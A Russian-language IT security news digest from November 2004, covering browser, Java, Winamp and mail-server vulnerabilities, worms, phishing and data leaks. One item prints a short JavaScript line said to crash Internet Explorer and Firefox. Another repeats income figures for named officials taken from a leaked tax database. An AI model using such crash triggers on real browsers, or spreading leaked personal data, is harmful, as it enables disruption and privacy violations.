Британская компания Deepnet Explorer заявила о намерении выпустить веб-браузер с функцией оповещения о фишинг-атаках, сообщает газета Sydney Morning Herald. Новый браузер будет называться так же как и создавшая его компания - Deepnet Explorer. Пользователи Deepnet Explorer станут первыми, кто получит в свое распоряжение браузер с функцией оповещения о фишинг-атаках. В случае, если пользователь Deepnet Explorer окажется на веб-странице, специально созданной интернет-мошенниками, встроенная в браузер Deepnet Phishing Alarm предупредит его об этом. Кроме того, Deepnet Explorer 1.3 останутся функции уже существующей версии браузера: блокирование поп-апов и доступ к файлообменнной сети Gnutella.
Подробнее

27/11/2004 10:52 В Москве задержан мошенник, торговавший в Интернете информацией об абонентах "БиЛайна"
Управление "К" российского МВД, специализирующееся на пресечении преступлений в сфере высоких технологий, задержало подозреваемого в незаконной продаже конфиденциальной информации об абонентах крупнейших российских сотовых компаний, сообщает в пятницу РИА "Новости". Как уточнил представитель пресс-службы Управления, в поле зрения правоохранительных органов мошенник попал в июне текущего года, после того как служба безопасности компании ОАО "ВымпелКом" (торговая марка "БиЛайн") выявила факты кражи информации из своей базы данных и проинформировала соответствующие подразделения МВД. "В результате проведенной совместной работы было установлено, что вышеуказанный гражданин в среднем за сумму, равную 500 долларов, продавал конфиденциальную информацию об абонентах крупнейших сотовых компаний, то есть сведения, связанные с нарушением неприкосновенности частной жизни", - сообщили в пресс-службе. С этой целью подозреваемый организовал в Интернете собственный сайт, с помощью которого и распространял информацию. По данному факту было возбуждено уголовное дело и начато расследование, в ходе которого милиционерам удалось установить группу лиц, задействованных в незаконном бизнесе. Сам мошенник был задержан в минувшем октябре с поличным.
РИА "Новости"

27/11/2004 10:20 Власти Финляндии не советуют пользоваться Internet Explorer
Официальные власти Финляндии распространили заявление, в котором призвали граждан страны временно воздержаться от использования компьютерной программы Microsoft Internet Explorer 6 из-за очередной обнаруженной "дыры". Как сообщает агентство France-Presse, предупреждение исходит от Управления по вопросам связи при Министерстве транспорта и связи Финляндии. По их мнению, "дыра" в системе безопасности, обнаруженная около двух недель назад, является достаточно серьезной, и населения страны необходимо предупредить. Информацию о критичной уязвимости распространили в программистских кругах в начале ноября два неизвестных хакера. Уязвимость связана с обработкой HTML-параметра IFRAME и позволяет запустить на компьютере жертвы произвольный код, если пользователь всего лишь посетит специальным образом сформированную страницу. Очень быстро появился и первый вирус, использующий эту ошибку. Он получил название Bofr и имеет вид электронного письма, содержащего ссылку на опасную страницу. Microsoft, недавно выпустившая очередной пакет "заплаток", заявляет, что изучает проблему, а тем временем уже зафиксировано появление новых вирусов.
Подробности

26/11/2004 15:29 Возвращаясь к вопросу о суде над Whale
Как известно, по решению суда Whale, который являлся членом группы 29А, был оштрафован на 3000 рублей. В ответ на действия Лаборатории Касперского, которая передала известную им информацию о Whale в правоохранительные органы для привлечения вирусописателя к уголовной ответственности, последовала реакция российских кардеров на это событие:
"Как бы там не было, в этот раз вы немного перегнули палку. Не стоило трогать 29A. Стукачей никто не любит, в том числе и мы. Денег у нас много и на данный момент сообществом решается вопрос о наказании доносчиков. Лично я согласен выделить на эту благую цель не менее $10000. Будут и другие желающие, я уверен. У вас есть выбор -прекратить лить грязь на Россию, а также завязать с практикой писания доносов или вашими чаяниями произойдет наконец слияние криминала с киберкриминалом, о котором так любит трещать "ЛК" на английской версии своего сайта...." - Capo di Capi.
z0mbie.host.sk
Комментарии: wirepuller

26/11/2004 12:19 Новая версия Winamp не устранила уязвимость
Как сообщил сегодня Brett Moore, обнаруживший ранеее уязвимость в популярном медиа-плеере Winamp (в библиотеке IN_CDDA.dl), во вновь вышедшей версии 5.06 Winamp уязвимость не устранена. Об этом были извещены производители (Nullsoft). Пока же, до выхода обновлённой версии рекомендуется убрать ассоциации с файлами .cda и .m3u из плеера.
BugtraQ

26/11/2004 11:51 Пираты опубликовали базу налоговой инспекции по подоходному налогу
Российские пираты украли и растиражировали базу налоговой инспекции по подоходному налогу. В открытый доступ попали 36 млн деклараций жителей Москвы и Подмосковья за 1999-2002 годы. За 1000 рублей любой желающий может узнать не только паспортные данные, но и доходы чиновников, бизнесменов и рядовых граждан, сообщает newsru.com. Там же содержатся паспортные данные, домашний адрес получателя дохода, юридический адрес и телефон компании, в которой он работает. "Ведомости" предполагают, что с помощью базы можно определить место работы любого лица Московского региона, проследить его финансовую историю, получить полный список сотрудников предприятия и акционеров-физлиц с указанием полученных дивидендов. Там есть также данные о купле- продаже и строительству недвижимости. В начале 2004 года среди профессионалов в области информбезопасности получила хождение база данных "Налоговая по физическим лицам". Сначала она продавалась за 2500, но сейчас ее цена снизилась до 2000 рублей из-за широкого распространения. База весьма похожа на настоящую. В ней нашлись доходы штатных сотрудников газеты, и они оказались верными. Собеседники газеты по просьбам журналисто вводили в эту базу различные имена. На имя "Михаил Ефимович Фрадков" база показывает, что в 2002 году этот человек получил в ФСНП доход на сумму почти 319 тысяч рублей и в управлении делами президента почти 17 тысяч. Ввод имени "Роман Аркадиевич Абрамович" показывает доход в ЗАО "Управляющая компания "Тройка-Диалог" в сумме свыше 4,7 млн рублей и в МДМ-банке свыше 16 тысяч. "Анатолий Борисович Чубайс", по данным базы, в числе прочих доходов получил в 2002 году: дивиденды в ОАО Мосэнерго (6000 рублей), в РАО ЕЭС (21 866 рублей), в ОАО ЦДУ РАО ЕЭС России (около 26 тысяч рублей) и в ОАО "Тройка-Диалог" (около 21 тысячи).
SecurityLab

26/11/2004 10:58 Уязвимость в IE и Firefox
Студент из Нидерландов Berend-Jan Wever сообщает об обнаружении уязвимости в популярных браузерах Internet Explorer и Firefox. Примечательно, что оба "валятся" от одного и того же кода, представляющего собой вызов бесконечного цикла вида (a = new Array(a)).sort(); Судя по всему, в результате выполнения подобного скрипта возникает переполнение буфера в стеке. Собственно, не совсем понятно - является ли это уязвимостью, потому что от вызова бесконечного цикла упадёт любой программный продукт. Тем не менее, разработчикам обоих браузеров было послано уведомление. Подробности приводятся на домашней странице автора.
Подробности

26/11/2004 10:31 Презентация Secret Disk Server NG
Компания Aladdin Software Security R.D., ведущий российский разработчик и поставщик продуктов и решений для защиты программного обеспечения и информационной безопасности, объявляет о проведении семинара «Secret Disk Server NG – новое поколение систем защиты корпоративной информации и баз данных от кражи и изъятия», сообщает osp.ru. В программе семинара предусмотрены доклады представителей компании Aladdin и её партнёров – "Поликом Про" и "7000", в которых будут освещены возможности и преимущества нового продукта, аспекты его практического использования, лицензирование, upgrade и пр. В ходе семинара будет проведен мастер-класс по администрированию и настройкам продукта и демонстрация работы Secret Disk Server NG в режиме реального времени. Также планируется организовать розыгрыш призов от компании Aladdin. На мероприятии будет анонсирована предновогодняя акция Aladdin по предоставлению в бесплатное пользование новой опции продукта, позволяющей блокировать прямой доступ для сотрудников компании к защищенным данным, что исключает возможность несанкционированного копирования и кражи конфиденциальной информации. Семинар состоится 2 декабря в конференц-центре гостиничного комплекса "Волга" по адресу: Москва, Докучаев пер., д. 2. м. "Сухаревская".
Подробности

26/11/2004 10:18 СА: наихудшую spyware-угрозу создает Kazaa
Секьюрити-фирма Computer Associates утверждает, что пиринговая программа Kazaa — самая опасная в интернете. Согласно распространенному компанией отчету Pest Patrol, Kazaa возглавляет пятерку опаснейших spyware-программ ввиду своей широкой популярности. Kazaa утверждает, что ее программа была загружена 214 млн раз. CA присвоила Kazaa высокий «клот-фактор» — собственную меру того, насколько программа замедляет работу машины в результате добавления необязательных элементов системного реестра и каталогов. Однако награждать популярное приложение вроде Kazaa ярлыком spyware — деликатное дело, и СА признает, что испытывает трудности при классификации подобных программ. Computer Associates утверждает, что любые другие программы для непосредственного обмена файлами, такие как Blubster, E-Mule, Gnucleus и WinMX, тоже могут замедлять работу сети и занимать пространство на диске, так как они нашпигованы adware или spyware. Второе место в рейтинге компании занимает adware-программа Ezula, за которой следуют adopt.hotbar.com и GameSpy Arcade. Перри говорит, что трудность точного определения spyware стала одной из причин, по которым компания часто называет те или иные программы паразитами (pests). По его словам, если с определением вируса сегодня все ясно, то понятие spyware лежит в нечеткой области. И первая пятерка, вероятно, не претерпит существенных изменений, так как у программ жизненный цикл намного длиннее, чем у вирусов.
ZDNet

26/11/2004 10:05 Microsoft готова бесплатно предоставлять лицензионные копии Windows XP в обмен на пиратские
Компания Microsoft готова бесплатно предоставлять лицензионные копии своей ОС Windows XP в обмен на пиратские. Для этого она начала проведение программы Windows XP Counterfeit Project. Действие программы распространяется на жителей Великобритании, причем только на тех пользователи, которые приобрели компьютер с предустановленной контрафактной системой. Как пишет издание Computer Weekly, "пользователи, подозревающие, что их копия Windows XP является нелегальной", могут обратиться в Microsoft, которая протестирует и при необходимости бесплатно заменит им систему, предоставив лицензионный пакет. Юридические лица могут обменять до 5 систем. Обещано, что в таких случаях пользователи не будут преследоваться правоохранительными органами, однако они должны будут предоставить данные о продавце системы, и именно их предполагается выследить и нейтрализовать с помощью этой программы. Как пояснил представитель лицензионного отдела корпорации Алекс Хилтон (Alex Hilton), нелегальное ПО представляет опасность для пользователей, так как оно непредсказуемо в работе, небезопасно и его пользователи не могут обращаться в техническую поддержку. В последнее время в Великобритании отмечено увеличение объемов рынка нелегального ПО, и именно этот факт побудил Microsoft начать свою программу.
Lenta.Ru

26/11/2004 09:43 Уязвимость в jabberd
Zhaowei сообщает об обнаруженной уязвимости в jabberd (бесплатном сервере популярного интернет-пейджера), которая может быть использована злоумышленниками для атаки на уязвимый сервер. Уязвимость связана с ошибкой при проверке границ в C2S (Client to Server) модуле при использовани для аутентификации mysql или pgsql. Специально созданный запрос с длинным именем пользователя может вызвать переполенние буфера, что в свою очередь может привести к выполнению произвольного кода на уязвимосй машине. Уязвимость подстверждена в версиях 2.0s2, 2.0s3, и 2.0s4, сообщается, что другие версии также могут быть уязвимы. Степень опасности - "высокая". Исправленная версия доступна в CVS репозитории.
Подробности

24/11/2004 15:07 Нажимать на баннеры становится опасно
Посетители многих европейских сайтов в минувшие выходные подхватили необычную «заразу». Новый червь Bofra распространялся через баннерообменные сети и заражал компьютер в том случае, если пользователь щелкал по баннеру. «Червивый» баннер ничем не отличался от остальных, но при нажатии на него пользователь попадал на сайт search.comedycentral.com (199.107.184.146). Этот сайт уже был заражен червем Bofra-A, который мгновенно запускал на выполнение вредоносный скрипт, использующий известную уязвимость в браузере Internet Explorer, связанную с некорректной обработкой тега IFrame. Как сообщается, «зараженные» баннеры проникли в крупную европейскую баннероообменную сеть Falk. В течение субботы эти баннеры демонстрировались на крупнейших британских сайтах, в том числе на сайте The Register. Эти же баннеры демонстрировались на крупнейшем новостном сайте Нидерландов с аудиторией в 450 тыс. уникальных посетителей в месяц, а также на других крупных голландских сайтах. После выполнения вредоносного скрипта червь Bofra-A загружает встроенный веб-сервер, который прослушивает один из портов в диапазоне от 1600/TCP до 1700/TCP, а также открывает IRC-соединение по порту 6667/TCP, позволяя удаленному злоумышленнику управлять системой.
Вебпланета

24/11/2004 14:34 Новая версия FineReader Engine
Компания ABBYY выпустила FineReader Engine 7.1 - новую версию инструмента разработчика, позволяющего встроить технологии распознавания ABBYY в любую программу. В продукт вошли сразу три технологии: FineReader (технология распознавания печатных документов), FormReader (технология ввода форм, заполненных от руки) и FlexiCapture (технология обработки гибких форм). FineReader Engine включает в себя все основные функции системы распознавания и при этом не имеет графического пользовательского интерфейса. Он представляет собой ядро технологии распознавания, с помощью которого можно интегрировать функции преобразования, распознавания документов и потокового ввода данных в любое приложение. Кроме того, новая версия позволяет выполнять распознавание меток (OMR), рукописных символов (ICR), а также анализ документа для ввода счетов (Document Analysis for Invoices). В числе других отличий новинки разработчики называют новый "Менеджер лицензий" (инструмент для управления лицензиями и распределением нагрузки между рабочими станциями, объединенными в локальную сеть), возможность распознавания корейских текстов, индийских цифр и др.
"Открытые системы"

24/11/2004 14:03 Новая версия SAMS для управления пользователями работающими через Squid
SAMS (Squid Account Management System) - программное средство для настройки и администрирования доступа пользователей к прокси-серверу SQUID с использованием авторизации ntlm в домене Windows, basic и по ip адресу, сообщает opennet.ru. Поддерживается отключение пользователей при превышении заданного лимита и ограничение трафика по группам. В качестве БД используется MySQL. В новой версии демон samsdaemon, как наиболее критичный по скорости компонент, переписан на языке Си, добавлена утилита samsf, непрерывно читающая логи squid, переписаны php скрипты web-интерфейса. Система работает, под Linux и FreeBSD.
Сайт проекта

24/11/2004 13:33 Уязвимости в Cyrus IMAP
Stefan Esser из немецкой компании e-matters сообщил о существовании уязвимостей в популярном серверном ПО Cyrus IMAP, предназначенного для обеспечения клиентов почтой по протоколам IMAP, POP3, KPOP (доставка). В процессе аудита исходного кода были обнаружены 4 уязвимости, существование которых может проявляться различным образом: переполнение буфера в стеке, переполнение буфера из-за некоректной проверки границ вводимых данных. В зависимости от уровня атакующего возможны различные ситуации, вплоть до возможности выполнения произвольного кода. Если вкратце, то эти уязвимости можно сформулировать так: переполнение буфера на этапе предварительной аутентификации при активации опции imapmagicplus, которая вызывается при выполнении команд PROXY и LOGIN, так как не проверяется длина вводимого имени пользователя. Вторая уязвимость связана с возможностью выхода за пределы выделяемого адресного пространства процесса из-за возможности перезаписи бита управляющей стуктуры выделения памяти функции malloc(), что может вести к получению контроля над данными, выводимыми кучей (heap). Подобная ситуация возможна из-за некорректной реализации команды PARTIAL. Подобная же уязвимость обнаружена в алгоритме обработки команды FETCH. Ну и последняя уязвимость связана с использованием неопределённой конструкцией программирования при реализации команды APPEND при использовании функции fatal(), поведение которой не определено стандартом ANSI C (имеется в виду различное поведение счётчика после выполнения операции выделения памяти в разных версиях компилятора gcc). Уязвимости обнаружены в версиях Cyrus IMAP <= 2.2.8. Администраторам рекомендовано обновить версию Cyrus IMAP на недавно вышедшую 2.2.9.
Описание

24/11/2004 13:11 Найден новый троян Jupdate
Сотрудники компании Symantec зафиксировали появление в интернете новой вредоносной программы, поражающей компьютеры под управлением операционных систем Microsoft Windows, сообщает "Компьюлента". После активации троян Jupdate записывает на жесткий диск две свои копии с произвольными именами, состоящими из строчных символов, и регистрируется в ключе автоматического запуска реестра. Далее Jupdate пытается завершить работу ряда процессов, связанных со службами безопасности, и открывает "черный вход" в систему, ожидая дальнейших команд от автора. На сегодняшний день вредоносная программа Jupdate широкого распространения не получила.
Описание

24/11/2004 12:21 Линус Торвальдс выступил против европейского закона о патентах
Создатель Linux призвал Совет ЕС не принимать проект директивы о патентах на программное обеспечение, который он считает «вводящим в заблуждение, опасным и демократически нелегитимным». Линус Торвальдс обратился к Совету Евросоюза с призывом не принимать «Директиву о патентоспособности изобретений, реализуемых на базе компьютера», известную как директива о патентах на программное обеспечение. В заявлении, опубликованном на антипатентном веб-сайте, он, а также соучредитель MySQL Майкл Видениус и создатель PHP Расмус Лердорф утверждают, что патенты на программное обеспечение легализовывать нельзя. «В интересах Европы, чтобы это вводящее в заблуждение, опасное и демократически нелегитимное предложение не стало общей позицией государств-членов, — взывают три светила open source. — Во имя сохранения инновационного и конкурентного рынка программного обеспечения мы искренне надеемся, что Европейский Союз использует эту возможность для отмены патентоспособности программного обеспечения». В своем заявлении Торвальдс, Видениус и Лердорф объясняют, какие риски несет в себе директива о патентовании ПО, предупреждая, в частности, что закон о патентах на программное обеспечение может причинить ущерб европейской экономике. «Патенты на программное обеспечение опасны для экономики в целом и особенно для европейской экономики, — говорят поборники open source. — Авторское право работает на авторов программного обеспечения, но патенты могут, напротив, лишить их всех прав на плоды собственного труда. Авторские права справедливы, потому что они одинаковы для всех. Режим патентования ПО ведет к насаждению закона силы и в конечном счете к созданию условий, скорее, несправедливости, чем правосудия».
ZDNet

24/11/2004 11:37 Подробности уязвимости в Java
Вчера мы сообщали об уязвимости в механизме обработки плагинов Java, которая была обнаружена Jouko Pynnonen. На своём сайте финский исследователь предоставляет более подробную информацию, а также приводит код JavaScript, демонстрирующий эту уязвимость. Как пишет сам автор, возможность обхода защиты Java связана с использованием так называемого reflection API. В примере автор приводит вариант скрипта, при помощи которого можно получить доступ к ограниченному частному классу "sun.text.Utility". В приведённом примере нельзя сделать очень многое, однако, пишет Jouko, используя другие частные классы Java, можно получить прямой доступ к памяти или к методам для модификации частных полей Java-объектов. Это может позволить злоумышленнику элементарно отключить Java security manager, что в дальнейшем позволит полностью снять ограничения, накладываемые моделью "песочницы" (sandbox) на апплеты Java. Об уязвимости было сообщено Sun 29 апреля сего года. На прошлой неделе, рассказывая о будущей операционной системе Sun Solaris 10, президент Джонатан Шварц отметил, что Java не была поражена ни одним вирусом. Однако новый пробел в защите позволяет вирусам использовать Java-плагин для заражения систем. Обнаруженная в октябре ошибка в Java-плагине для сотовых телефонов продемонстрировала, как злокачественная программа, замаскированная под полезное приложение, может разрушить программное обеспечение телефона.
Описание

24/11/2004 10:52 В войну браузеров вступает Opera 7.60
Opera утверждает, что в следующей версии ее браузера усовершенствован механизм обработки страниц, что облегчает просмотр и распечатку онлайновых документов. Opera 7.60, которая выйдет в конце года, содержит новую технологию рендеринга, исключающую потребность в горизонтальной прокрутке веб-страниц, независимо от размера экрана. Онлайновые документы можно также распечатывать на бумаге любого размера без отсечения краев. Кроме того, браузер позволит увеличивать веб-страницы и просматривать их без горизонтального скролинга. Новый механизм использует сочетание разных методов: там, где это возможно, он изменяет расположение элементов на странице, а при необходимости регулирует и размер этих элементов. В зависимости от того, как составлена веб-старница, это может привести либо к изменению ее масштаба, либо к вытеснению некоторых элементов за нижнюю границу экрана. Opera уже давно работает над проблемой рендеринга веб-страниц для малогабаритных экранов. Она предлагает версии браузера для разных мобильных телефонов, включая трубки Nokia, Sony Ericsson, Panasonic и Siemens. Недавно к ним добавилась и поддержка смартфонов Microsoft — тем самым Opera отказалась от самоограничения, запрещающего ей производить ПО для софтверного гиганта. Opera 7.60 должна также ускорить веб-браузинг, благодаря партнерству с SlipStream, о котором было объявлено три недели назад.
Подробнее

24/11/2004 10:36 Сенат США не согласился сажать в тюрьму любителей MP3
Американский Сенат принял законопроект о защите авторских прав в более мягкой редакции, чем предлагалось ранее. Как сообщает агентство Reuters, вне закона объявлены технологии нелегального копирования и распространения кинофильмов, однако предложение сажать в тюрьму рядовых пользователей, практикующих обмен музыкой через пиринговые сети, не было поддержано сенаторами. Тем, кто тайно снимает на видеокамеру фильмы в кинотеатрах, может грозить тюремное заключение на срок до трех лет. Также более жесткое наказание ожидает людей, занятых распространением музыки, фильмов и программ до их официального релиза. Вместе с тем были отклонены поправки, предусматривающие уголовное преследование миллионов пользователей интернета, бесплатно копирующих музыку и фильмы в файлообменных сетях. В частности, предлагалось отправлять любителей музыки в тюрьму на три года за копирование более тысячи песен. Под давлением общественных организаций, групп защиты потребителей и производителей бытовой электроники данные поправки не вошли в итоговый законопроект. Однако департамент юстиции Сената, настаивавший на их включении, заявил, что он по-прежнему планирует ужесточить подход к преступлениям, связанным с нарушением прав на интеллектуальную собственность. Новый закон также берет защиту такие технические решения, как система контент-фильтрации DVD-дисков ClearPlay, которая позволяет вырезать из фильмов сексуально откровенные и жестокие сцены.
Lenta.Ru

24/11/2004 09:19 Обновление программных модулей Dr.Web® для Windows
Произведено очередное обновление ряда программных модулей антивируса для рабочих станций под Microsoft Windows. Основное исправление, включенное в данное обновление Dr.Web® для Windows, заключается в оптимизации работы антивируса с демонстрационными ключами, в частности, усовершенствован механизм их получения. Как известно, начиная с версии 4.32, антивирусная программа Dr.Web® для Windows поставляется без ознакомительного ключа, который традиционно имел ряд ограничений и не давал пользователям возможности всесторонне познакомиться с функциональностью и преимуществами антивируса Dr. Web®. Взамен ознакомительного ключа пользователи Dr. Web®, впервые устанавливающие у себя эту программу, могут в течение 20 дней совершенно бесплатно пользоваться полнофункциональной версией Dr.Web® для Windows, что обеспечивается наличием демонстрационного ключевого файла, который получается автоматически в процессе установки антивируса на компьютер пользователя. В связи с тем, что контроль ключевого файла осуществляется многими компонентами Dr.Web® для Windows, обновлены следующие компоненты: drweb386.exe, drwebcl.exe, drweb32w.exe, drwebscd.exe, spider.exe (редакция 4.32.2.11152), spider.vxd, spiderml.exe, drwebupw.exe.
Источник

23/11/2004 16:05 Прогноз Microsoft: через два года мы забудем о спаме
Во время своего визита в Мадрид Билл Гейтс, отец-основатель софтверного гиганта Microsoft, заявил, что современные разработки в области блокировки спама позволят нам через пару лет абсолютно забыть об этой ныне насущной проблеме, сообщает AFP. Ранее уже сообщалось, что Гейтс является самым популярным адресатом у спамеров, в результате чего он получает около четырех миллионов писем ежедневно, большая часть из которых - невостребованная корреспонденция. Глава Microsoft Стив Баллмер утверждает, что системы защиты почтовых серверов постоянно совершенствуются и блокируют большую часть спама, приходящего к владельцам почтовых ящиков. Глава корпорации также отметил, что их корпоративная система безопасности фильтрует практически все зловредные сообщения. То, что пока проникает сквозь фильтры, и составляет тот объем получаемой "сорной" информации. Следует отметить, что эксперты продолжают вести исследования, направленные на изучение структуры использующихся спамерами фраз, и стремятся, тем самым, оптимизировать системы блокировки.
"Компьюлента"

23/11/2004 14:13 Стандарт четырех
Компании Conectiva, MandrakeSoft, Progeny Linux Systems и Turbolinux объединились для разработки единой кодовой базы дистрибутивов Linux, совместимой со стандартом Linux Standard Base 2.0. С этой целью ими образован альянс Linux Core Consortium. Его участники рассчитывают на увеличение числа программных разработок и рост количества оборудования, оптимизированного для стандартизованной кодовой базы Linux. Компании, вошедшие в состав альянса, обменяются технологиями и приглашают других поставщиков дистрибутивов к вступлению в организацию. Единая кодовая основа, созданная Linux Core Consortium, войдет в состав дистрибутивов Conectiva Enterprise Server, MandrakeSoft Corporate Server, Progeny Componentized Linux и Turbolinux Enterprise Server. Предпринимавшийся ранее аналогичный проект UnitedLinux прекратил свое существование после того, как участвовавшая в нем SCO предъявила свой печально знаменитый иск к IBM.
"Открытые системы"

23/11/2004 13:52 Будь осторожен: твой принтер следит за тобой!
А знаете ли вы, что современные цветные лазерные принтеры не только покорно выполняют все требования своих владельцев, но и оставляют на распечатываемом документе свою уникальную "подпись", позволяющую без особого труда вычислить кем, когда и на каком АЦПУ был распечатан очередной шедевр современного "самиздата". По информации журнала PC World, для того чтобы выяснить, принадлежит ли ваш верный принтер к компании цифровых стукачей, достаточно вооружиться лупой и светодиодным фонариком. Если на гладкой поверхности бумаги, только что выплюнутой из чрева цветного лазерного принтера появится россыпь крохотных желтых точек – вы попали, можете смело выбрасывать чудо техники на помойку, потому что в этой желтой россыпи закодирован серийный номер устройства, его производитель и бог знает, что еще. Как признается директор исследовательского подразделения компании Xerox Питер Крин (Peter Crean), правительства большинства развитых стран мира уже давно и успешно используют скрытую маркировку для борьбы с изготовителями фальшивых денег и, можно предположить, что не только с ними.
Internet.Ru

23/11/2004 12:41 Уязвимость в технологии Java-расширений
Jouko Pynnonen из iDEFENSE, Inc. обнаружил уязвимость в технологии обработки так называемых Java-расширений (они же - плагины - Java Plug-in). Эти расширения являются частью Java 2 Runtime Environment (JRE) и предназначены для обеспечения взаимодействия между браузером и платформой Java. Подобные соединения позволяют запустить апплеты, которые размещены на Вэб-сайте внутри браузера. Ошибка, которая обнаружена в механизме обработки подобных расширений (разработан и поддерживается Sun), позволяет удалённому атакующему обойти защиту "песочниц" Java (sandbox) и обойти ограничения безопасности внутри апплетов Java. Как пишет автор уязвимости, существует определённое количество частных Java-пакетов внутри виртуальной машины Java (JVM). В нормальных условиях ограничения в системе безопасности предотвращают доступ апплетов к подобным пакетам. При этом при попытке доступа к подобным пакетам формируется сообщение 'AccessControlException' (если сам пользователь не разрешит доступ этих апплетов). Проблема существует в механизме управления обменом данными между Java и Javascript при работе браузера с использованием технологии плагинов. В результате, используя код Javascript, возникает возможность загрузки небезопасного класса, который в обычной ситуации не может быть загружен Java-апплетом. Успешная эксплуатация уязвимости позволяет удалённому атакующему выполнить вредоносный апплет, который поолучает доступ к системным файлам и может загрузить и выполнить произвольный файл через сеть. Так как JRE применяется на многих платформах и браузерах, возникает возможность создания кросс-платформенного и браузеро-независимого кода эксплоита. Уязвимость проверена и подтверждена в J2SE версий 1.4.2_01, 1.4.2_04. Для временного устранения уязвимости рекомендуется отключить Java или JavaScript, так как уязвимость связана с взаимодействием этих двух компонентов. Также возможно использование виртуальных машин Java других разработчиков, в частности, Microsoft VM (как ни странно). Уязвимость устранена в выпущенной недавно J2SE 1.4.2_06.
Описание

23/11/2004 12:11 Linspire продает OOoFf! — гибрид Firefox и OpenOffice.org
Linux-компания Linspire объявила о выпуске OOoFf! — коробочной версии программного пакета, содержащего открытый офисный набор OpenOffice.org и web-браузер Firefox от Mozilla. Комплект, состоящий из двух дисков, предоставляет свободное программное обеспечения для операционных систем Linux, Mac OS и Microsoft Windows. Продукт позиционируется компанией как открытая альтернатива коммерческому ПО и предназначен, в первую очередь, для популяризации в массах настольной Linux.
nixp.ru

23/11/2004 11:39 Недельный отчет о вирусах Panda Software
Опубликован традиционный еженедельный отчёт Panda Software о вирусной активности прошедшей недели. В отчёте рассмотрены пять червей: Sober.I, Bagle.BG, Yanz.A, Drew.A и Aler.A, а также троянец Msnsoug.A.
Отчёт

23/11/2004 11:08 Уязвимость в Winamp
Brett Moore cообщил об обнаружении уязвимости в популярном медиа-плеере Winamp. Уязвимость связана с некорректной обработкой размера буфера библиотекой "IN_CDDA.dll". В результате, злоумышленник может сформировать определённый файл ".m3u" (плейлист для плеера), который, будучи помещён на сервере и скачан в дальнейшем пользователем, будучи запущен - позволяет выполнить прпоизвольный код в системе. Уязвимость обнаружена в Winamp версии ниже 5.05. Рекомендуется обновиться до версии 5.0.6. Ниже приведено подробное описание уязвимости в виде PDF-документа.
Описание уязвимости

23/11/2004 10:45 В браузере Opera обнаружены уязвимости
В реализации Java-механизма браузера Opera найдены несколько уязвимостей. Используя дыры, злоумышленник теоретически может повысить уровень собственных привилегий в целевой системе или организовать DoS-атаку на удаленный компьютер. Кроме того, еще одна брешь обеспечивает возможность несанкционированного доступа к конфиденциальной информации о машине и ее владельце. Нападение может быть организовано через сформированный особым образом Java-апплет, при обработке которого в браузере возникает ошибка. Дыры присутствуют в пакете Opera версии 7.54 и более ранних модификациях программы.
Подробности

23/11/2004 09:42 Oracle метит в середину
Глядя на IBM, Microsoft и других, Oracle наращивании усилия в области программного обеспечения инфраструктуры — и в следующем месяце планирует рассказать о новом сервере управления контентом и переработанном семействе серверов приложений. Сражаясь за контроль над поставщиком приложений PeopleSoft, Oracle продолжает заниматься и собственными продуктами, в частности, промежуточным ПО — серверными программами, предназначенными для создания и эксплуатации бизнес-приложений. Стратегия компании заключается в том, чтобы, конкурируя со специализированными поставщиками и тяжеловесами отрасли, создать полный комплекс ПО инфраструктуры. Как рассказали CNET News.com руководители компании, в декабре на своей конференции OpenWorld Oracle анонсирует сервер управления контентом. Эта инициатива с кодовым названием Tsunami опирается на существующий бизнес СУБД Oracle и нацелена на создание специализированного сервера для управления залежами деловой информации, которая хранится в форме документов: e-mail, электронными таблицами и технической документацией. На той же конференции Oracle расскажет и об обновленном комплексе ПО сервера приложений, куда войдет переработанный сервер интеграции. Чтобы обеспечить заказчикам больше гибкости при комбинировании отдельных компонентов, Oracle начнет продавать разные редакции своего ПО инфраструктуры на базе Java.
ZDNet

23/11/2004 09:28 Microsoft будет бороться с пиратами вместе с Thomson
Французская электротехническая компания Thomson присодинилась к антипиратскому консорциуму ContentGuard, образованному в 2000 году по инициативе американской Microsoft. В понедельник было обнародовано совместное заявление, гласящее, что Thomson покупает 33-процентный голосующий пакет акций ContentGuard. Задачей совместного предприятия ContentGuard объявлена выработка новых производственных стандартов и методик для компаний, чья продукция может эксплуатироваться пиратами. Предполагается, что в итоге производителям контрафактных товаров будет гораздо сложнее обходить новые способы защиты. Предприятие было образовано компаниями Microsoft и Xerox, однако впоследствии последняя продала большую часть акций медиахолдингу Time Warner. Как полагают аналитики, участие в консорциуме европейской Thomson поможет Microsoft избежать проблем с руководством Евросоюза, которое обвиняет американскую корпорацию в попытке узурпировать европейский рынок операционных систем и имеет полномочия по регулированию отдельных сфер ее деятельности. По сообщению Associated Press, посредством интеграции с европейской компанией Microsoft может перевести некоторые процедуры под ее юрисдикцию, после чего Евросоюз не сможет препятствовать действиям корпорации в той же мере, так как она станет частично европейской.
lenta.Ru

22/11/2004 17:30 Эксплоит уязвимости phpBB
Опубликован эксплоит уязвимости, недавно обнаруженной в популярном ПО организации форумов - phpBB. Написан на том же языке скриптов PHP. Для успешной работы скрипта необходимо наличие на машине установленного PHP (версии 4.x) с CURL-расширением (библиотекой). В свете крайних событий (см. предыдущие новости на эту тему), настоятельно рекомендуем администраторам обновить phphBB на обновлённую версию, в которой уязвимость устранена.
Cкрипт

22/11/2004 15:29 SANS: Новая десятка главных опасностей в UNIX/Linux
На протяжении последних четырех лет SANS Institute сотрудничал с Национальным центром защиты инфраструктуры ФБР (FBI National Infrastructure Protection Center) по созданию списка наиболее часто встречаемых уязвимостей в безопасности информационных технологий. Список регулярно обновляется, и вот последняя версия главных угроз безопасности UNIX/Linux-систем, сообщает nixp.ru:
) Самый популярный DNS-сервер в интернете — BIND (Berkeley Internet Name Domain).
2) Любой используемый web-сервер (в первую очередь, из-за популярности — Apache).
3) Пароли (как пользователей, так и самих админстраторов).
4) Системы контроля версий (самые популярные — CVS, Subversion).
5) Электронная почта (самый популярный MTA — Sendmail — и все сообщество его альтернатив: Qmail, Courier, Exim, Postfix…).
6) Удаленное управление (SNMP рекомендуется отключать при малейшем возможности).
7) OpenSSL.
8) Плохо настроенные корпоративные серверы NIS и NSF.
9) Базы данных.
10) Уязвимости в ядре.
Подробности

22/11/2004 13:48 Помогут ли репрессии защитить авторские права
